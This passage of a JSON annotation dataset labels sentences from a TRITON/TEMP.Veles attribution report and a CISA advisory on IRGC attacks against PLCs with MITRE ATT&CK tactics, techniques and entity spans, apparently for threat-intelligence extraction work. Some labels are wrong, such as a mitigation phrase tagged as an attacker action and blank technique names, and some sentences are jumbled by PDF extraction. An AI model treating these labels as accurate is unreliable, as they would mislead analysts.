"end": 89, "label": "Infrastructure_Indicator" }, { "text": "malicious activity", "start": 39, "end": 57, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s27-8bdb23", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140, which is registered to CNIIHM.", "sentence_text": "This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1596", "name": "Search Open Technical Databases" } ], "procedure": "monitor open-source TRITON coverage", "entities": [ { "text": "TEMP.Veles", "start": 171, "end": 181, "label": "ThreatActor" }, { "text": "TRITON", "start": 65, "end": 71, "label": "MalwareTool" }, { "text": "used to monitor open-source coverage", "start": 25, "end": 61, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s28-e0a64a", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities.", "sentence_text": "It also has engaged in network reconnaissance against targets of interest to TEMP.Veles.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1595", "name": "Active Scanning" } ], "procedure": "conduct network reconnaissance", "entities": [ { "text": "TEMP.Veles", "start": 77, "end": 87, "label": "ThreatActor" }, { "text": "engaged in network reconnaissance", "start": 12, "end": 45, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s29-3ffd56", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "It also has engaged in network reconnaissance against targets of interest to TEMP.Veles.", "sentence_text": "The IP address has been tied to additional malicious activity in support of the TRITON intrusion.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "IP address has been tied to additional malicious activity in support of the TRITON intrusion", "entities": [ { "text": "TRITON", "start": 80, "end": 86, "label": "MalwareTool" }, { "text": "IP address", "start": 4, "end": 14, "label": "Infrastructure_Indicator" }, { "text": "malicious activity", "start": 43, "end": 61, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s30-cd58ae", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "The IP address has been tied to additional malicious activity in support of the TRITON intrusion.", "sentence_text": "Multiple files have Cyrillic names and artifacts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s31-2ed3c5", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "Multiple files have Cyrillic names and artifacts.", "sentence_text": "Behavior Patterns Consistent with Moscow Time Zone Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow, lending some further support to the scenario that CNIIHM, a Russian research organization in Moscow, has been involved in TEMP.Veles activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s32-9755d4", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "Behavior Patterns Consistent with Moscow Time Zone Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow, lending some further support to the scenario that CNIIHM, a Russian research organization in Moscow, has been involved in TEMP.Veles activity.", "sentence_text": "We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target’s network.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1570", "name": "Lateral Tool Transfer" } ], "procedure": "TEMP.Veles created files during lateral movement on a target’s network", "entities": [ { "text": "TEMP.Veles", "start": 58, "end": 68, "label": "ThreatActor" }, { "text": "files", "start": 47, "end": 52, "label": "MalwareTool" }, { "text": "target’s network", "start": 106, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "identified file creation times", "start": 3, "end": 33, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s33-f8eb33", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target’s network.", "sentence_text": "These file creation times conform to a work schedule typical of an actor operating within a UTC+3 time zone (Figure 1) supporting a proximity to Moscow.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s34-9a421c", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "These file creation times conform to a work schedule typical of an actor operating within a UTC+3 time zone (Figure 1) supporting a proximity to Moscow.", "sentence_text": "Additional language artifacts recovered from TEMP.Veles toolsets are also consistent with such a regional nexus.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "language artifacts recovered from TEMP.Veles toolsets are consistent with regional nexus", "entities": [ { "text": "TEMP.Veles", "start": 45, "end": 55, "label": "ThreatActor" }, { "text": "toolsets", "start": 56, "end": 64, "label": "MalwareTool" }, { "text": "language artifacts", "start": 11, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "recovered", "start": 30, "end": 39, "label": "Action" }, { "text": "consistent with", "start": 74, "end": 89, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s35-bddb94", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "Additional language artifacts recovered from TEMP.Veles toolsets are also consistent with such a regional nexus.", "sentence_text": "A ZIP archive recovered during our investigations, schtasks.zip, contained an installer and uninstaller of CATRUNNER that includes two versions of an XML scheduled task definitions for a masquerading service ‘ProgramDataUpdater.’", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "deploy masquerading service via scheduled task", "entities": [ { "text": "CATRUNNER", "start": 107, "end": 116, "label": "MalwareTool" }, { "text": "ZIP archive", "start": 2, "end": 13, "label": "Infrastructure_Indicator" }, { "text": "schtasks.zip", "start": 51, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "masquerading", "start": 187, "end": 199, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s36-f0062b", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "A ZIP archive recovered during our investigations, schtasks.zip, contained an installer and uninstaller of CATRUNNER that includes two versions of an XML scheduled task definitions for a masquerading service ‘ProgramDataUpdater.’", "sentence_text": "The malicious installation version has a task name and description in English, and the clean uninstall version has a task name and description in Cyrillic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s37-bbfe82", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "The malicious installation version has a task name and description in English, and the clean uninstall version has a task name and description in Cyrillic.", "sentence_text": "The timeline of modification dates within the ZIP also suggest the actor changed the Russian version to English in sequential order, heightening the possibility of a deliberate effort to mask its origins (Figure 2).", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "change Russian to English to mask origins", "entities": [ { "text": "actor", "start": 67, "end": 72, "label": "ThreatActor" }, { "text": "ZIP", "start": 46, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "mask its origins", "start": 187, "end": 203, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s38-d67258", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "The timeline of modification dates within the ZIP also suggest the actor changed the Russian version to English in sequential order, heightening the possibility of a deliberate effort to mask its origins (Figure 2).", "sentence_text": "CNIIHM Likely Possesses Necessary Institutional Knowledge and Personnel to Create TRITON and Support TEMP.Veles Operations While we know that TEMP.Veles deployed the TRITON attack framework, we do not have specific evidence to prove that CNIIHM did (or did not) develop the tool.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "deploy TRITON attack framework", "entities": [ { "text": "CNIIHM", "start": 0, "end": 6, "label": "ThreatActor" }, { "text": "TEMP.Veles", "start": 101, "end": 111, "label": "ThreatActor" }, { "text": "TRITON", "start": 82, "end": 88, "label": "MalwareTool" }, { "text": "deployed", "start": 153, "end": 161, "label": "Action" }, { "text": "develop the tool", "start": 262, "end": 278, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s39-f5e293", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "CNIIHM Likely Possesses Necessary Institutional Knowledge and Personnel to Create TRITON and Support TEMP.Veles Operations While we know that TEMP.Veles deployed the TRITON attack framework, we do not have specific evidence to prove that CNIIHM did (or did not) develop the tool.", "sentence_text": "We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute’s self-described mission and other public information.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "maintains the institutional expertise needed to develop and prototype TRITON", "entities": [ { "text": "CNIIHM", "start": 14, "end": 20, "label": "ThreatActor" }, { "text": "TRITON", "start": 98, "end": 104, "label": "MalwareTool" }, { "text": "develop and prototype", "start": 76, "end": 97, "label": "Action" }, { "text": "maintains the institutional expertise needed", "start": 28, "end": 72, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s40-3500ff", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "We infer that CNIIHM likely maintains the institutional expertise needed to develop and prototype TRITON based on the institute’s self-described mission and other public information.", "sentence_text": "CNIIHM has at least two research divisions that are experienced in critical infrastructure, enterprise safety, and the development of weapons/military equipment:\nThe Center for Applied Research creates means and methods for protecting critical infrastructure from destructive information and technological impacts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s41-598406", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "CNIIHM has at least two research divisions that are experienced in critical infrastructure, enterprise safety, and the development of weapons/military equipment:\nThe Center for Applied Research creates means and methods for protecting critical infrastructure from destructive information and technological impacts.", "sentence_text": "The Center for Experimental Mechanical Engineering develops weapons as well as military and special equipment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s42-da9db8", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "The Center for Experimental Mechanical Engineering develops weapons as well as military and special equipment.", "sentence_text": "It also researches methods for enabling enterprise safety in emergency situations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s43-b7c915", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "It also researches methods for enabling enterprise safety in emergency situations.", "sentence_text": "The Association of State Scientific Centers “Nauka,” which coordinates 43 Scientific Centers of the Russian Federation (SSC RF).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s44-062190", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 44, "context_before": "The Association of State Scientific Centers “Nauka,” which coordinates 43 Scientific Centers of the Russian Federation (SSC RF).", "sentence_text": "The Russian Academy of Missile and Artillery Sciences (PAPAH) which specializes in research and development for strengthening Russia’s defense industrial complex.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s45-d75079", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 45, "context_before": "The Russian Academy of Missile and Artillery Sciences (PAPAH) which specializes in research and development for strengthening Russia’s defense industrial complex.", "sentence_text": "Primary Alternative Explanation Unlikely", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s46-1c9d94", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 46, "context_before": "Primary Alternative Explanation Unlikely", "sentence_text": "Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer’s approval.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s47-7bbea9", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 47, "context_before": "Some possibility remains that one or more CNIIHM employees could have conducted the activity linking TEMP.Veles to CNIIHM without their employer’s approval.", "sentence_text": "However, this scenario is highly unlikely.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s48-5298dc", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 48, "context_before": "However, this scenario is highly unlikely.", "sentence_text": "CNIIHM’s characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s49-ca28bd", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 49, "context_before": "CNIIHM’s characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity.", "sentence_text": "TRITON is a highly specialized framework whose development would be within the capability of a low percentage of intrusion operators.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "development of TRITON would be within the capability of a low percentage of intrusion operators", "entities": [ { "text": "TRITON", "start": 0, "end": 6, "label": "MalwareTool" }, { "text": "intrusion operators", "start": 113, "end": 132, "label": "ThreatActor" }, { "text": "development", "start": 47, "end": 58, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s50-42b8a4", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 50, "context_before": "TRITON is a highly specialized framework whose development would be within the capability of a low percentage of intrusion operators.", "sentence_text": "Posted in\nThreat Intelligence\nSecurity & Identity Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s51-6b821f", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 51, "context_before": "Posted in\nThreat Intelligence\nSecurity & Identity Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s1-2d9a14", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "TLP:CLEAR\nCo-Authored by: Product ID: AA23-335A December 18, 2024 IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities Summary Actions to take today to mitigate malicious activity: Note: This updated joint Cybersecurity Advisory reflects new ", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T0883", "name": "" } ], "procedure": "exploit PLCs in critical infrastructure", "entities": [ { "text": "IRGC-Affiliated Cyber Actors", "start": 66, "end": 94, "label": "ThreatActor" }, { "text": "PLCs", "start": 103, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "Exploit", "start": 95, "end": 102, "label": "Action" }, { "text": "US Water and Wastewater Systems Facilities", "start": 139, "end": 181, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-91_mitre_report-p1-s2-12cdf5", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "TLP:CLEAR\nCo-Authored by: Product ID: AA23-335A December 18, 2024 IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities Summary Actions to take today to mitigate malicious activity: Note: This updated joint Cybersecurity Advisory reflects new ", "sentence_text": "Address operational technology investigative and analytic insights for network defenders on connected insecurely to the internet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s3-3b1d31", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "Address operational technology investigative and analytic insights for network defenders on connected insecurely to the internet.", "sentence_text": "malicious cyber activities conducted by advanced persistent threat (APT) cyber actors affiliated with the Iranian  Implement multifactor Government’s Islamic Revolutionary Guard Corps (IRGC).", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0885", "name": "" } ], "procedure": "malicious cyber activities conducted by APT actors", "entities": [ { "text": "Islamic Revolutionary Guard Corps (IRGC)", "start": 151, "end": 191, "label": "ThreatActor" }, { "text": "advanced persistent threat (APT) cyber actors", "start": 40, "end": 85, "label": "ThreatActor" }, { "text": "malicious cyber activities", "start": 0, "end": 26, "label": "Action" }, { "text": "Implement multifactor", "start": 116, "end": 137, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p1-s4-9ad458", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "malicious cyber activities conducted by advanced persistent threat (APT) cyber actors affiliated with the Iranian  Implement multifactor Government’s Islamic Revolutionary Guard Corps (IRGC).", "sentence_text": "This authentication.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s5-561669", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "This authentication.", "sentence_text": "advisory includes recent and historically observed tactics, ", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s6-592336", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "advisory includes recent and historically observed tactics, ", "sentence_text": "New information on the extent of the activity, including newly observed TTPs employed by IRGC- affiliated APT cyber actors targeting U.S. and global critical infrastructure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s7-a70ae3", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "New information on the extent of the activity, including newly observed TTPs employed by IRGC- affiliated APT cyber actors targeting U.S. and global critical infrastructure.", "sentence_text": "o Mapping of these newly observed TTPs to additional MITRE ATT&CK® Tactics and Techniques.\nU.S.organizations: To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office and/or CISA’s 24/7 Operations Center at SayCISA@cisa.gov or (884) 729- 2472.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s8-ce3e13", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "o Mapping of these newly observed TTPs to additional MITRE ATT&CK® Tactics and Techniques.\nU.S.organizations: To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office and/or CISA’s 24/7 Operations Center at SayCISA@cisa.gov or (884) 729- 2472.", "sentence_text": "For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s9-06e9b4", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.", "sentence_text": "SLTT organizations should report incidents to MS-ISAC (866-787- 4722 or SOC@cisecurity.org).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s10-6c7d71", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "SLTT organizations should report incidents to MS-ISAC (866-787- 4722 or SOC@cisecurity.org).", "sentence_text": "Canadianorgnizations:Report incidents by emailing CCCS at contact@cyber.gc.ca.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s11-ad6329", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Canadianorgnizations:Report incidents by emailing CCCS at contact@cyber.gc.ca.", "sentence_text": "U.K.organizations:Report significant cyber security incidents to ncsc.gov.uk/report-an-incident (monitored 24 hours).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s12-5a94b1", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "U.K.organizations:Report significant cyber security incidents to ncsc.gov.uk/report-an-incident (monitored 24 hours).", "sentence_text": "This document is marked TLP:CLEAR.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s13-280b3a", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "This document is marked TLP:CLEAR.", "sentence_text": "Disclosure is not limited.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s14-4a98be", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "Disclosure is not limited.", "sentence_text": "Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s15-c05546", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release.", "sentence_text": "Subject to standard copyright rules, TLP:CLEAR information may be distributed without restriction.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s16-ef2e1f", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "Subject to standard copyright rules, TLP:CLEAR information may be distributed without restriction.", "sentence_text": "For more information on the Traffic Light Protocol, see cisa.gov/tlp.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p1-s17-2c5f32", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "For more information on the Traffic Light Protocol, see cisa.gov/tlp.", "sentence_text": "TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p2-s18-722ac0", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 2, "sentence_id": 18, "context_before": "TLP:CLEAR", "sentence_text": "This joint advisory provides TTPs obtained from extensive FBI investigation on this activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p2-s19-df89dc", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 2, "sentence_id": 19, "context_before": "This joint advisory provides TTPs obtained from extensive FBI investigation on this activity.", "sentence_text": "The IRGC is designated as a foreign terrorist organization by the United States and Canada.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p2-s20-fd4c88", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 2, "sentence_id": 20, "context_before": "The IRGC is designated as a foreign terrorist organization by the United States and Canada.", "sentence_text": "In November 2023, IRGC-affiliated cyber actors using the persona “CyberAv3ngers” began actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs) and human machine interfaces (HMIs).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "target and compromise Unitronics PLCs and HMIs", "entities": [ { "text": "IRGC-affiliated cyber actors", "start": 18, "end": 46, "label": "ThreatActor" }, { "text": "CyberAv3ngers", "start": 66, "end": 79, "label": "ThreatActor" }, { "text": "Unitronics Vision Series programmable logic controllers (PLCs)", "start": 136, "end": 198, "label": "Infrastructure_Indicator" }, { "text": "human machine interfaces (HMIs)", "start": 203, "end": 234, "label": "Infrastructure_Indicator" }, { "text": "compromising", "start": 110, "end": 122, "label": "Action" }, { "text": "targeting", "start": 96, "end": 105, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p2-s21-25b417", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 2, "sentence_id": 21, "context_before": "In November 2023, IRGC-affiliated cyber actors using the persona “CyberAv3ngers” began actively targeting and compromising Israeli-made Unitronics Vision Series programmable logic controllers (PLCs) and human machine interfaces (HMIs).", "sentence_text": "Every equipment ‘made in Israel’ is CyberAv3ngers legal target.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p2-s22-98da00", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 2, "sentence_id": 22, "context_before": "Every equipment ‘made in Israel’ is CyberAv3ngers legal target.”", "sentence_text": "The victims spanned multiple U.S. states and foreign countries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p2-s23-21ee14", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 2, "sentence_id": 23, "context_before": "The victims spanned multiple U.S. states and foreign countries.", "sentence_text": "The PLCs may be rebranded and appear as originating from different manufacturers and companies.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p2-s24-96aabd", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 2, "sentence_id": 24, "context_before": "The PLCs may be rebranded and appear as originating from different manufacturers and companies.", "sentence_text": "Complementing a previously published CISA Alert, the authoring agencies are releasing this updated joint advisory to share TTPs associated with IRGC cyber operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p2-s25-300c3a", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 2, "sentence_id": 25, "context_before": "Complementing a previously published CISA Alert, the authoring agencies are releasing this updated joint advisory to share TTPs associated with IRGC cyber operations.", "sentence_text": "Overview of Updated Information This advisory provides observed TTPs the authoring agencies assess are likely associated with this IRGC- affiliated APT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p2-s26-43720b", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 2, "sentence_id": 26, "context_before": "Overview of Updated Information This advisory provides observed TTPs the authoring agencies assess are likely associated with this IRGC- affiliated APT.", "sentence_text": "The late 2023 campaign conducted by CyberAv3ngers compromised additional Unitronics version types, including older PLC models, than were previously outlined.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "compromise additional Unitronics PLC models", "entities": [ { "text": "CyberAv3ngers", "start": 36, "end": 49, "label": "ThreatActor" }, { "text": "Unitronics version types", "start": 73, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "older PLC models", "start": 109, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "compromised", "start": 50, "end": 61, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p2-s27-21e5f9", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 2, "sentence_id": 27, "context_before": "The late 2023 campaign conducted by CyberAv3ngers compromised additional Unitronics version types, including older PLC models, than were previously outlined.", "sentence_text": "The IRGC-affiliated APT cyber actors also developed custom ladder logic files to download for each of these device types.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T0857", "name": "" } ], "procedure": "developed custom ladder logic files to download to devices", "entities": [ { "text": "IRGC-affiliated APT cyber actors", "start": 4, "end": 36, "label": "ThreatActor" }, { "text": "logic files", "start": 66, "end": 77, "label": "MalwareTool" }, { "text": "developed", "start": 42, "end": 51, "label": "Action" }, { "text": "download", "start": 81, "end": 89, "label": "Action" } ] }, { "uid": "mitre-91_mitre_report-p2-s28-63d103", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 2, "sentence_id": 28, "context_before": "The IRGC-affiliated APT cyber actors also developed custom ladder logic files to download for each of these device types.", "sentence_text": "This targeting of PLCs poses an ongoing risk to UK organizations that utilize these components in their Page 2 of 11 | Product ID: AA23-335A TLP:CLEAR", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-91_mitre_report-p3-s29-8d7d9a", "source": "mitre", "doc_id": "91_mitre_report", "page_number": 3, "sentence_id": 29, 